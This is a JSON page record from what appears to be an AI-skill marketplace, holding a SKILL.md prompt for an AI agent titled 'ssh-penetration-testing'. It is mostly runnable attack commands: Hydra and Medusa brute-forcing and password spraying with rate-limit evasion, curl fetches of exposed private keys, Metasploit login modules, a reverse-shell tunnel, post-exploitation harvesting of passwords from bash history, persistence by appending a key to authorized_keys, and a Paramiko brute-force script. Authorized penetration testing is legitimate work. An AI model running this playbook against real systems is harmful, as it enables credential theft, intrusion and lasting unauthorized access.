[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"skill-4df5a0d4-af0d-47b1-ab54-831644ae4bd6":3,"$fC0I2Eaqp7I-gNMWJq71hyVa896HIIZW8hb3ZcBjw3GM":43},{"id":4,"title":5,"description":6,"categoryId":7,"moduleId":8,"tags":9,"prompt":10,"icon":11,"source":12,"sourceUrl":13,"authorId":14,"authorName":15,"isPublic":16,"stars":17,"runs":18,"createdAt":19,"updatedAt":19,"module":20,"category":27,"packages":34},"4df5a0d4-af0d-47b1-ab54-831644ae4bd6","ssh-penetration-testing","进行全面SSH安全评估，包括枚举、凭证攻击、漏洞利用、隧道技术以及利用后活动。这项技能涵盖了测试SSH服务安全性的完整方法。","cat_coding_review","mod_coding","sickn33,coding","---\nname: ssh-penetration-testing\ndescription: \"Conduct comprehensive SSH security assessments including enumeration, credential attacks, vulnerability exploitation, tunneling techniques, and post-exploitation activities. This skill covers the complete methodology for testing SSH service security.\"\nrisk: offensive\nsource: community\nauthor: zebbern\ndate_added: \"2026-02-27\"\n---\n\n> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.\n\n# SSH Penetration Testing\n\n## Purpose\n\nConduct comprehensive SSH security assessments including enumeration, credential attacks, vulnerability exploitation, tunneling techniques, and post-exploitation activities. This skill covers the complete methodology for testing SSH service security.\n\n## Prerequisites\n\n### Required Tools\n- Nmap with SSH scripts\n- Hydra or Medusa for brute-forcing\n- ssh-audit for configuration analysis\n- Metasploit Framework\n- Python with Paramiko library\n\n### Required Knowledge\n- SSH protocol fundamentals\n- Public\u002Fprivate key authentication\n- Port forwarding concepts\n- Linux command-line proficiency\n\n## Outputs and Deliverables\n\n1. **SSH Enumeration Report** - Versions, algorithms, configurations\n2. **Credential Assessment** - Weak passwords, default credentials\n3. **Vulnerability Assessment** - Known CVEs, misconfigurations\n4. **Tunnel Documentation** - Port forwarding configurations\n\n## Core Workflow\n\n### Phase 1: SSH Service Discovery\n\nIdentify SSH services on target networks:\n\n```bash\n# Quick SSH port scan\nnmap -p 22 192.168.1.0\u002F24 --open\n\n# Common alternate SSH ports\nnmap -p 22,2222,22222,2200 192.168.1.100\n\n# Full port scan for SSH\nnmap -p- --open 192.168.1.100 | grep -i ssh\n\n# Service version detection\nnmap -sV -p 22 192.168.1.100\n```\n\n### Phase 2: SSH Enumeration\n\nGather detailed information about SSH services:\n\n```bash\n# Banner grabbing\nnc 192.168.1.100 22\n# Output: SSH-2.0-OpenSSH_8.4p1 Debian-5\n\n# Telnet banner grab\ntelnet 192.168.1.100 22\n\n# Nmap version detection with scripts\nnmap -sV -p 22 --script ssh-hostkey 192.168.1.100\n\n# Enumerate supported algorithms\nnmap -p 22 --script ssh2-enum-algos 192.168.1.100\n\n# Get host keys\nnmap -p 22 --script ssh-hostkey --script-args ssh_hostkey=full 192.168.1.100\n\n# Check authentication methods\nnmap -p 22 --script ssh-auth-methods --script-args=\"ssh.user=root\" 192.168.1.100\n```\n\n### Phase 3: SSH Configuration Auditing\n\nIdentify weak configurations:\n\n```bash\n# ssh-audit - comprehensive SSH audit\nssh-audit 192.168.1.100\n\n# ssh-audit with specific port\nssh-audit -p 2222 192.168.1.100\n\n# Output includes:\n# - Algorithm recommendations\n# - Security vulnerabilities\n# - Hardening suggestions\n```\n\nKey configuration weaknesses to identify:\n- Weak key exchange algorithms (diffie-hellman-group1-sha1)\n- Weak ciphers (arcfour, 3des-cbc)\n- Weak MACs (hmac-md5, hmac-sha1-96)\n- Deprecated protocol versions\n\n### Phase 4: Credential Attacks\n\n#### Brute-Force with Hydra\n\n```bash\n# Single username, password list\nhydra -l admin -P \u002Fusr\u002Fshare\u002Fwordlists\u002Frockyou.txt ssh:\u002F\u002F192.168.1.100\n\n# Username list, single password\nhydra -L users.txt -p Password123 ssh:\u002F\u002F192.168.1.100\n\n# Username and password lists\nhydra -L users.txt -P passwords.txt ssh:\u002F\u002F192.168.1.100\n\n# With specific port\nhydra -l admin -P passwords.txt -s 2222 ssh:\u002F\u002F192.168.1.100\n\n# Rate limiting evasion (slow)\nhydra -l admin -P passwords.txt -t 1 -w 5 ssh:\u002F\u002F192.168.1.100\n\n# Verbose output\nhydra -l admin -P passwords.txt -vV ssh:\u002F\u002F192.168.1.100\n\n# Exit on first success\nhydra -l admin -P passwords.txt -f ssh:\u002F\u002F192.168.1.100\n```\n\n#### Brute-Force with Medusa\n\n```bash\n# Basic brute-force\nmedusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh\n\n# Multiple targets\nmedusa -H targets.txt -u admin -P passwords.txt -M ssh\n\n# With username list\nmedusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ssh\n\n# Specific port\nmedusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -n 2222\n```\n\n#### Password Spraying\n\n```bash\n# Test common password across users\nhydra -L users.txt -p Summer2024! ssh:\u002F\u002F192.168.1.100\n\n# Multiple common passwords\nfor pass in \"Password123\" \"Welcome1\" \"Summer2024!\"; do\n    hydra -L users.txt -p \"$pass\" ssh:\u002F\u002F192.168.1.100\ndone\n```\n\n### Phase 5: Key-Based Authentication Testing\n\nTest for weak or exposed keys:\n\n```bash\n# Attempt login with found private key\nssh -i id_rsa user@192.168.1.100\n\n# Specify key explicitly (bypass agent)\nssh -o IdentitiesOnly=yes -i id_rsa user@192.168.1.100\n\n# Force password authentication\nssh -o PreferredAuthentications=password user@192.168.1.100\n\n# Try common key names\nfor key in id_rsa id_dsa id_ecdsa id_ed25519; do\n    ssh -i \"$key\" user@192.168.1.100\ndone\n```\n\nCheck for exposed keys:\n\n```bash\n# Common locations for private keys\n~\u002F.ssh\u002Fid_rsa\n~\u002F.ssh\u002Fid_dsa\n~\u002F.ssh\u002Fid_ecdsa\n~\u002F.ssh\u002Fid_ed25519\n\u002Fetc\u002Fssh\u002Fssh_host_*_key\n\u002Froot\u002F.ssh\u002F\n\u002Fhome\u002F*\u002F.ssh\u002F\n\n# Web-accessible keys (check with curl\u002Fwget)\ncurl -s http:\u002F\u002Ftarget.com\u002F.ssh\u002Fid_rsa\ncurl -s http:\u002F\u002Ftarget.com\u002Fid_rsa\ncurl -s http:\u002F\u002Ftarget.com\u002Fbackup\u002Fssh_keys.tar.gz\n```\n\n### Phase 6: Vulnerability Exploitation\n\nSearch for known vulnerabilities:\n\n```bash\n# Search for exploits\nsearchsploit openssh\nsearchsploit openssh 7.2\n\n# Common SSH vulnerabilities\n# CVE-2018-15473 - Username enumeration\n# CVE-2016-0777 - Roaming vulnerability\n# CVE-2016-0778 - Buffer overflow\n\n# Metasploit enumeration\nmsfconsole\nuse auxiliary\u002Fscanner\u002Fssh\u002Fssh_version\nset RHOSTS 192.168.1.100\nrun\n\n# Username enumeration (CVE-2018-15473)\nuse auxiliary\u002Fscanner\u002Fssh\u002Fssh_enumusers\nset RHOSTS 192.168.1.100\nset USER_FILE \u002Fusr\u002Fshare\u002Fwordlists\u002Fusers.txt\nrun\n```\n\n### Phase 7: SSH Tunneling and Port Forwarding\n\n#### Local Port Forwarding\n\nForward local port to remote service:\n\n```bash\n# Syntax: ssh -L \u003Clocal_port>:\u003Cremote_host>:\u003Cremote_port> user@ssh_server\n\n# Access internal web server through SSH\nssh -L 8080:192.168.1.50:80 user@192.168.1.100\n# Now access http:\u002F\u002Flocalhost:8080\n\n# Access internal database\nssh -L 3306:192.168.1.50:3306 user@192.168.1.100\n\n# Multiple forwards\nssh -L 8080:192.168.1.50:80 -L 3306:192.168.1.51:3306 user@192.168.1.100\n```\n\n#### Remote Port Forwarding\n\nExpose local service to remote network:\n\n```bash\n# Syntax: ssh -R \u003Cremote_port>:\u003Clocal_host>:\u003Clocal_port> user@ssh_server\n\n# Expose local web server to remote\nssh -R 8080:localhost:80 user@192.168.1.100\n# Remote can access via localhost:8080\n\n# Reverse shell callback\nssh -R 4444:localhost:4444 user@192.168.1.100\n```\n\n#### Dynamic Port Forwarding (SOCKS Proxy)\n\nCreate SOCKS proxy for network pivoting:\n\n```bash\n# Create SOCKS proxy on local port 1080\nssh -D 1080 user@192.168.1.100\n\n# Use with proxychains\necho \"socks5 127.0.0.1 1080\" >> \u002Fetc\u002Fproxychains.conf\nproxychains nmap -sT -Pn 192.168.1.0\u002F24\n\n# Browser configuration\n# Set SOCKS proxy to localhost:1080\n```\n\n#### ProxyJump (Jump Hosts)\n\nChain through multiple SSH servers:\n\n```bash\n# Jump through intermediate host\nssh -J user1@jump_host user2@target_host\n\n# Multiple jumps\nssh -J user1@jump1,user2@jump2 user3@target\n\n# With SSH config\n# ~\u002F.ssh\u002Fconfig\nHost target\n    HostName 192.168.2.50\n    User admin\n    ProxyJump user@192.168.1.100\n```\n\n### Phase 8: Post-Exploitation\n\nActivities after gaining SSH access:\n\n```bash\n# Check sudo privileges\nsudo -l\n\n# Find SSH keys\nfind \u002F -name \"id_rsa\" 2>\u002Fdev\u002Fnull\nfind \u002F -name \"id_dsa\" 2>\u002Fdev\u002Fnull\nfind \u002F -name \"authorized_keys\" 2>\u002Fdev\u002Fnull\n\n# Check SSH directory\nls -la ~\u002F.ssh\u002F\ncat ~\u002F.ssh\u002Fknown_hosts\ncat ~\u002F.ssh\u002Fauthorized_keys\n\n# Add persistence (add your key)\necho \"ssh-rsa AAAAB3...\" >> ~\u002F.ssh\u002Fauthorized_keys\n\n# Extract SSH configuration\ncat \u002Fetc\u002Fssh\u002Fsshd_config\n\n# Find other users\ncat \u002Fetc\u002Fpasswd | grep -v nologin\nls \u002Fhome\u002F\n\n# History for credentials\ncat ~\u002F.bash_history | grep -i ssh\ncat ~\u002F.bash_history | grep -i pass\n```\n\n### Phase 9: Custom SSH Scripts with Paramiko\n\nPython-based SSH automation:\n\n```python\n#!\u002Fusr\u002Fbin\u002Fenv python3\nimport paramiko\nimport sys\n\ndef ssh_connect(host, username, password):\n    \"\"\"Attempt SSH connection with credentials\"\"\"\n    client = paramiko.SSHClient()\n    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n    \n    try:\n        client.connect(host, username=username, password=password, timeout=5)\n        print(f\"[+] Success: {username}:{password}\")\n        return client\n    except paramiko.AuthenticationException:\n        print(f\"[-] Failed: {username}:{password}\")\n        return None\n    except Exception as e:\n        print(f\"[!] Error: {e}\")\n        return None\n\ndef execute_command(client, command):\n    \"\"\"Execute command via SSH\"\"\"\n    stdin, stdout, stderr = client.exec_command(command)\n    output = stdout.read().decode()\n    errors = stderr.read().decode()\n    return output, errors\n\ndef ssh_brute_force(host, username, wordlist):\n    \"\"\"Brute-force SSH with wordlist\"\"\"\n    with open(wordlist, 'r') as f:\n        passwords = f.read().splitlines()\n    \n    for password in passwords:\n        client = ssh_connect(host, username, password.strip())\n        if client:\n            # Run post-exploitation commands\n            output, _ = execute_command(client, 'id; uname -a')\n            print(output)\n            client.close()\n            return True\n    return False\n\n# Usage\nif __name__ == \"__main__\":\n    target = \"192.168.1.100\"\n    user = \"admin\"\n    \n    # Single credential test\n    client = ssh_connect(target, user, \"password123\")\n    if client:\n        output, _ = execute_command(client, \"ls -la\")\n        print(output)\n        client.close()\n```\n\n### Phase 10: Metasploit SSH Modules\n\nUse Metasploit for comprehensive SSH testing:\n\n```bash\n# Start Metasploit\nmsfconsole\n\n# SSH Version Scanner\nuse auxiliary\u002Fscanner\u002Fssh\u002Fssh_version\nset RHOSTS 192.168.1.0\u002F24\nrun\n\n# SSH Login Brute-Force\nuse auxiliary\u002Fscanner\u002Fssh\u002Fssh_login\nset RHOSTS 192.168.1.100\nset USERNAME admin\nset PASS_FILE \u002Fusr\u002Fshare\u002Fwordlists\u002Frockyou.txt\nset VERBOSE true\nrun\n\n# SSH Key Login\nuse auxiliary\u002Fscanner\u002Fssh\u002Fssh_login_pubkey\nset RHOSTS 192.168.1.100\nset USERNAME admin\nset KEY_FILE \u002Fpath\u002Fto\u002Fid_rsa\nrun\n\n# Username Enumeration\nuse auxiliary\u002Fscanner\u002Fssh\u002Fssh_enumusers\nset RHOSTS 192.168.1.100\nset USER_FILE users.txt\nrun\n\n# Post-exploitation with SSH session\nsessions -i 1\n```\n\n## Quick Reference\n\n### SSH Enumeration Commands\n\n| Command | Purpose |\n|---------|---------|\n| `nc \u003Chost> 22` | Banner grabbing |\n| `ssh-audit \u003Chost>` | Configuration audit |\n| `nmap --script ssh*` | SSH NSE scripts |\n| `searchsploit openssh` | Find exploits |\n\n### Brute-Force Options\n\n| Tool | Command |\n|------|---------|\n| Hydra | `hydra -l user -P pass.txt ssh:\u002F\u002Fhost` |\n| Medusa | `medusa -h host -u user -P pass.txt -M ssh` |\n| Ncrack | `ncrack -p 22 --user admin -P pass.txt host` |\n| Metasploit | `use auxiliary\u002Fscanner\u002Fssh\u002Fssh_login` |\n\n### Port Forwarding Types\n\n| Type | Command | Use Case |\n|------|---------|----------|\n| Local | `-L 8080:target:80` | Access remote services locally |\n| Remote | `-R 8080:localhost:80` | Expose local services remotely |\n| Dynamic | `-D 1080` | SOCKS proxy for pivoting |\n\n### Common SSH Ports\n\n| Port | Description |\n|------|-------------|\n| 22 | Default SSH |\n| 2222 | Common alternate |\n| 22222 | Another alternate |\n| 830 | NETCONF over SSH |\n\n## Constraints and Limitations\n\n### Legal Considerations\n- Always obtain written authorization\n- Brute-forcing may violate ToS\n- Document all testing activities\n\n### Technical Limitations\n- Rate limiting may block attacks\n- Fail2ban or similar may ban IPs\n- Key-based auth prevents password attacks\n- Two-factor authentication adds complexity\n\n### Evasion Techniques\n- Use slow brute-force: `-t 1 -w 5`\n- Distribute attacks across IPs\n- Use timing-based enumeration carefully\n- Respect lockout thresholds\n\n## Troubleshooting\n\n| Issue | Solutions |\n|-------|-----------|\n| Connection Refused | Verify SSH running; check firewall; confirm port; test from different IP |\n| Authentication Failures | Verify username; check password policy; key permissions (600); authorized_keys format |\n| Tunnel Not Working | Check GatewayPorts\u002FAllowTcpForwarding in sshd_config; verify firewall; use `ssh -v` |\n\n## When to Use\nThis skill is applicable to execute the workflow or actions described in the overview.\n","","imported","https:\u002F\u002Fgithub.com\u002Fsickn33\u002Fantigravity-awesome-skills","user_system_seed","SkillOPIC",true,125,1658,"2026-05-16 13:41:55",{"id":8,"name":21,"slug":22,"icon":23,"description":24,"sort":25,"createdAt":26},"编程开发","coding","mdi-code-braces","代码生成、调试、审查，提升开发效率",2,"2026-05-16 12:53:40",{"id":7,"name":28,"slug":29,"icon":30,"description":31,"moduleId":8,"sort":32,"skillCount":33,"createdAt":26},"代码审查","review","mdi-magnify-scan","代码质量分析、安全审查",4,145,[35],{"id":36,"skillId":4,"version":37,"fileName":38,"fileSize":39,"filePath":40,"fileHash":41,"manifest":42,"createdAt":19},"921a9965-0379-43f5-869f-bbb0c24b2c8b","1.0.0","ssh-penetration-testing.zip",4484,"uploads\u002Fskills\u002F4df5a0d4-af0d-47b1-ab54-831644ae4bd6\u002Fssh-penetration-testing.zip","59d6671d3997e689e48c42333ee0afc7add383ecd16f364dcfadd132b3715d3f","[{\"path\":\"SKILL.md\",\"isDirectory\":false,\"size\":12170}]",{"code":44,"message":45,"data":46},200,"success",{"items":47,"stats":48,"page":51},[],{"averageRating":49,"totalRatings":49,"ratingCounts":50},0,[49,49,49,49,49],{"limit":52,"offset":49,"hasMore":53,"nextOffset":52,"ratedOnly":16},15,false]